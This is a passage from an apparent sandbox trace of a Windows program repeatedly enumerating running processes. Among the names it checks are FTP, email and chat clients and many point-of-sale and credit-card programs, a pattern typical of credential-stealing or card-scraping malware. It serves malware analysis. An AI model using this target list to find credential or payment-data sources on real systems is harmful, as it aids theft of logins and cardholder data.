th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0290.656] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0290.657] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0290.659] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0290.660] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0290.662] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0290.663] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0290.664] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0290.666] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0290.667] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0290.670] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0290.672] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0290.674] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0290.675] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0290.677] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0290.679] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0290.680] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0290.682] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0290.705] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0290.707] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0290.708] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0290.710] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0290.712] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0290.713] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0290.715] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0290.717] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0290.718] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0290.720] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0290.721] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0290.723] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0290.724] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0290.726] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0290.728] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0290.729] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0290.731] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0290.732] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0290.734] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0290.736] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0290.737] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0290.739] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0290.740] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0290.741] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0290.743] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0290.744] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0290.746] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0290.798] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0290.800] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.801] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.803] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.804] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.806] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.807] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0290.809] CloseHandle (hObject=0x2134) returned 1 [0290.809] Sleep (dwMilliseconds=0x64) [0290.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0290.931] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.933] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.935] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.936] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.938] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.939] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.941] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.942] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.944] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.945] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.947] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.948] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.950] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.951] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.953] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.955] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.956] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.958] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.959] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.961] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.962] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0290.964] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0290.972] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.974] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.975] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0290.977] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0290.978] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0290.981] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.983] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.984] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0290.986] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.988] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, 